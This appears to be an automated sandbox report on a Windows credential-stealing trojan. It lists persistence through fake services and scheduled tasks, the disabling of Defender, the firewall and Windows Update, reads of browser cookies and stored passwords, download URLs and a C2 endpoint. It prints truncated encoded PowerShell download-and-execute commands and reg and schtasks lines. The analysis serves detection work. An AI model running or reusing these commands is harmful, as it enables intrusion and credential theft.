Technical Information
To ensure autorun and distribution
Creates or modifies the following files
- <SYSTEM32>\tasks\microsoft\windows\shell\updshell
- <SYSTEM32>\tasks\microsoft\windows\autochk\systemproxy
- <SYSTEM32>\tasks\microsoft\windows\mobilepc\detectpc
- <SYSTEM32>\tasks\update shell
Creates the following services
- [<HKLM>\System\CurrentControlSet\Services\WinDefends] 'ImagePath' = 'cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBD...
- [<HKLM>\System\CurrentControlSet\Services\thundersec] 'ImagePath' = 'cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBD...
- [<HKLM>\System\CurrentControlSet\Services\WindowsNetworkSVC] 'ImagePath' = 'cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAG...
Malicious functions
To bypass firewall, removes or modifies the following registry keys
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile] 'DisableNotifications' = '00000001'
- [<HKLM>\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile] 'DisableNotifications' = '00000001'
To complicate detection of its presence in the operating system,
blocks execution of the following system utilities:
- Windows Update
Downloads
- https://gist.githubusercontent.com/sslsecurityonline/f24b98d89d6b0c1ef7c3d24e788348de/raw/6e3cb9665c02065cc2487aa1d3228e2531636fd0/aa
- https://raw.githubusercontent.com/sslsecurityonline/thdr/master/thd
Injects code into
the following system processes:
- %WINDIR%\syswow64\notepad.exe
Terminates or attempts to terminate
the following system processes:
- <SYSTEM32>\cmd.exe
- %WINDIR%\syswow64\explorer.exe
Searches for registry branches where third party applications store passwords
- [<HKCU>\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook]
- [<HKCU>\Software\Martin Prikryl\WinSCP 2\Sessions\]
Reads files which store third party applications passwords
- %LOCALAPPDATA%\google\chrome\user data\default\cookies
- %LOCALAPPDATA%\google\chrome\user data\default\web data
- %HOMEPATH%\desktop\applicantform_en.doc
- %HOMEPATH%\desktop\holycrosschurchinstructions.docx
- %HOMEPATH%\desktop\issi2013_template_for_posters.docx
- %HOMEPATH%\desktop\sdszfo.docx
Modifies file system
Creates the following files
- %TEMP%\2fda\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\2fda\freebl3.dll
- %TEMP%\2fda\mozglue.dll
- %TEMP%\2fda\msvcp140.dll
- %TEMP%\2fda\nss3.dll
- %TEMP%\2fda\nssdbm3.dll
- %TEMP%\2fda\softokn3.dll
- %TEMP%\2fda\ucrtbase.dll
- %TEMP%\2fda\vcruntime140.dll
- %TEMP%\11311097935247643537995.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %TEMP%\1140578892826104939799.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
- %TEMP%\11403751265230224215731.tmp
- %TEMP%\1140390840262147664724.tmp
- %TEMP%\11404537326540418389544.tmp
- %TEMP%\11404537326540418389544.tmp-shm
- %TEMP%\1140500541185949084556.tmp
- %TEMP%\1140500139934551259751.tmp
- %TEMP%\11405313883196611378947.tmp
- %TEMP%\1140531940338080804140.tmp
- %TEMP%\11405467465227721293262.tmp
- %TEMP%\11405461564578974361774.tmp
- %TEMP%\11405627480374855628855.tmp
- %TEMP%\2fda\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\11311408116592149483626.tmp
- %TEMP%\2fda\api-ms-win-crt-private-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\2fda\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\2fda\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
- %TEMP%\1140578892826104939799.tmp-shm
Deletes the following files
- %TEMP%\11311097935247643537995.tmp
- %TEMP%\2fda\api-ms-win-core-rtlsupport-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-synch-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-sysinfo-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-timezone-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-util-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-conio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-convert-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-environment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-filesystem-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-locale-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-multibyte-l1-1-0.dll
- %TEMP%\2fda\ucrtbase.dll
- %TEMP%\2fda\api-ms-win-crt-private-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-process-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-runtime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-stdio-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-string-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-time-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-utility-l1-1-0.dll
- %TEMP%\2fda\freebl3.dll
- %TEMP%\2fda\mozglue.dll
- %TEMP%\2fda\msvcp140.dll
- %TEMP%\2fda\nss3.dll
- %TEMP%\2fda\nssdbm3.dll
- %TEMP%\2fda\softokn3.dll
- %TEMP%\2fda\api-ms-win-core-profile-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-crt-math-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-1.dll
- %TEMP%\1140578892826104939799.tmp
- %TEMP%\11311408116592149483626.tmp
- %TEMP%\11403751265230224215731.tmp
- %TEMP%\1140390840262147664724.tmp
- %TEMP%\11404537326540418389544.tmp-shm
- %TEMP%\11404537326540418389544.tmp
- %TEMP%\1140500541185949084556.tmp
- %TEMP%\1140500139934551259751.tmp
- %TEMP%\11405313883196611378947.tmp
- %TEMP%\1140531940338080804140.tmp
- %TEMP%\11405467465227721293262.tmp
- %TEMP%\11405461564578974361774.tmp
- %TEMP%\11405627480374855628855.tmp
- %TEMP%\1140578892826104939799.tmp-shm
- %TEMP%\2fda\api-ms-win-core-console-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processenvironment-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-datetime-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-debug-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-errorhandling-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-file-l2-1-0.dll
- %TEMP%\2fda\api-ms-win-core-handle-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-heap-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-interlocked-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-libraryloader-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-localization-l1-2-0.dll
- %TEMP%\2fda\api-ms-win-core-memory-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-namedpipe-l1-1-0.dll
- %TEMP%\2fda\api-ms-win-core-processthreads-l1-1-0.dll
- %TEMP%\2fda\vcruntime140.dll
Network activity
TCP
HTTP POST requests
- http://hy###lan.xyz/ynvs2/index.php
UDP
- DNS ASK gi##.###hubusercontent.com
- DNS ASK google.com
- DNS ASK ra#.####ubusercontent.com
- DNS ASK hy###lan.xyz
- DNS ASK gi##ab.com
Miscellaneous
Creates and executes the following
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgACQAdAByAHUAZQAKAGMAbQBkACAALwBjACAAcgBlAGcAIABhAGQAZA...' (with hidden window)
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /f /tn "Update Shell" /sc hourly /mo 1 /tr "powershell -w 1 -C IEX ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($(Get-ItemProperty -Path H...' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c sc start thundersec' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ec WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoA...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -e ZABvACAAewAkAHAAaQBuAGcAIAA9ACAAdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAGMAbwBtAHAAIABnAG8AbwBnAGwAZQAuAGMAbwBtACAALQBjAG8AdQBuAHQAIAAxACAALQBRAHUAaQBlAHQAfQAgAHUAbgB0AGkAb...' (with hidden window)
Executes the following
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -w 1 -exec bypass -ec JABjAG8AbQAgAD0AIAAiAFUAdwBCAGwAQQBIAFEAQQBMAFEAQgBOAEEASABBAEEAVQBBAEIAeQBBAEcAVQBBAFoAZwBCAGwAQQBIAEkAQQBaAFEAQgB1AEEARwBNAEEAWgBRAEEAZwBBAEMAMABBAFIAQQBCAHAAQQBIAE0AQQB...
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /tn \Microsoft\Windows\Autochk\SystemProxy /run
- '%WINDIR%\syswow64\schtasks.exe' /tn \Microsoft\Windows\Autochk\SystemProxy /run
- '%WINDIR%\syswow64\cmd.exe' /c sc delete WindowsNetworkSVC
- '%WINDIR%\syswow64\sc.exe' delete WindowsNetworkSVC
- '%WINDIR%\syswow64\cmd.exe' /c sc create WindowsNetworkSVC binpath= "cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAb...
- '%WINDIR%\syswow64\sc.exe' create WindowsNetworkSVC binpath= "cmd /c powershell -w 1 -exec bypass -e aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8...
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\MobilePC\DetectPC /tr "cmd /c sc start WindowsNetworkSVC" /sc hourly /mo 1 /RL HIGHEST /RU "NT AUTHORITY\SYSTEM" /f
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ec WwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoA...
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /f /tn "Update Shell" /sc hourly /mo 1 /tr "powershell -w 1 -C IEX ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($(Get-ItemProperty -Path H...
- '%WINDIR%\syswow64\schtasks.exe' /create /f /tn "Update Shell" /sc hourly /mo 1 /tr "powershell -w 1 -C IEX ([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($(Get-ItemProperty -Path HKCU:\Softwar...
- '<SYSTEM32>\cmd.exe' /c sc start thundersec
- '<SYSTEM32>\sc.exe' start thundersec
- '<SYSTEM32>\cmd.exe' /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwA...
- '%WINDIR%\syswow64\notepad.exe'
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\Autochk\SystemProxy /sc hourly /f /mo 1 /tr "cmd /c sc start thundersec" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\cmd.exe' /c schtasks /create /tn \Microsoft\Windows\MobilePC\DetectPC /tr "cmd /c sc start WindowsNetworkSVC" /sc hourly /mo 1 /RL HIGHEST /RU "NT AUTHORITY\SYSTEM" /f
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\Autochk\SystemProxy /sc hourly /f /mo 1 /tr "cmd /c sc start thundersec" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\cmd.exe' /c sc delete WinDefends
- '%WINDIR%\syswow64\cmd.exe' /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\reg.exe' add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
- '%WINDIR%\syswow64\cmd.exe' /c sc stop wuauserv
- '%WINDIR%\syswow64\sc.exe' stop wuauserv
- '%WINDIR%\syswow64\cmd.exe' /c sc config wuauserv start= disabled
- '%WINDIR%\syswow64\sc.exe' config wuauserv start= disabled
- '%WINDIR%\syswow64\sc.exe' delete WinDefends
- '%WINDIR%\syswow64\cmd.exe' /c sc create thundersec binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8...
- '%WINDIR%\syswow64\cmd.exe' /c sc create WinDefends binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8...
- '%WINDIR%\syswow64\sc.exe' create WinDefends binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkA...
- '%WINDIR%\syswow64\cmd.exe' /c SCHTASKS /create /tn \Microsoft\Windows\Shell\updshell /sc hourly /f /mo 8 /tr "cmd /c sc start WinDefends" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\schtasks.exe' /create /tn \Microsoft\Windows\Shell\updshell /sc hourly /f /mo 8 /tr "cmd /c sc start WinDefends" /ru "NT AUTHORITY\SYSTEM" /RL HIGHEST
- '%WINDIR%\syswow64\cmd.exe' /c sc delete thundersec
- '%WINDIR%\syswow64\sc.exe' delete thundersec
- '%WINDIR%\syswow64\sc.exe' create thundersec binpath= "cmd /c powershell -exec bypass -w 1 -ec aQBlAHgAIAAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkA...
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -e ZABvACAAewAkAHAAaQBuAGcAIAA9ACAAdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAtAGMAbwBtAHAAIABnAG8AbwBnAGwAZQAuAGMAbwBtACAALQBjAG8AdQBuAHQAIAAxACAALQBRAHUAaQBlAHQAfQAgAHUAbgB0AGkAb...
